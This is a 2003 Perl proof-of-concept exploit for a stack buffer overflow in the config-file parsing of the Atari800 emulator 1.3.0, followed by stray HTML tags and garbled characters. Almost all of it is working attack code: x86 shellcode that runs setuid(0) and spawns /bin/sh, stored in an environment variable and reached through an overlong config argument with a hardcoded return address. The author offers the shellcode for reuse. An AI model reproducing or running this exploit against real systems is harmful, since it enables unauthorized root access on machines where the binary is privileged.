#!perl ######################################################## # PoC By OpTiKoOl, for Atari 800 Emulator, Version 1.3.0 # based on # http://www.securityfocus.com/archive/1/331518/2003-08-01/2003-08-07/0 # - # This PoC exploits a bof in parsing a very long config file ( > 250 bytes ) # As in the advisory there's other bofs. but i just researched this one to # make a Proof-Of-Concept Code. # In Gentoo Linux (distro where this poc was developed) there isn't any suid # atari800 binaries. i suppose.. :D # - # Tested against Atari800 from portage. # OpTiKoOl@syners.org & OpTiKoOl@psyfreakz.org # - # Big kiss to Neuza ;* ehehe The Buf Smashing The Stack! lol # and a fucking shout to psychedelic ppl, you rockZ! # Stay Fresh! sub head { print "##################################################### # PoC against Atari 800 Emulator, Version 1.3.0 # by OpTiKoOl\@syners.org and OpTiKoOl\@psyfreakz.org # 02/08/2003, CopyLeft by OpTiKoOl ... # http://www.syners.org/ & http://psyfreakz.org/ # - # Big Kiss 2 Neuza ;* Chuak! Chuak! #\n"; } # this sc was ripped from a fake (trojaned) exploit... # but this is a real shellcode, so enjoy :D $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" #setuid 0 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c" . "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb" . "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; $buf = "SYNERSOWNZ" x 25; $ENV{'SYNERS'} = $shellcode; $buf .= "\xad\xff\xff\xbf"; &head; exec("/usr/bin/atari800 -config $buf");
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß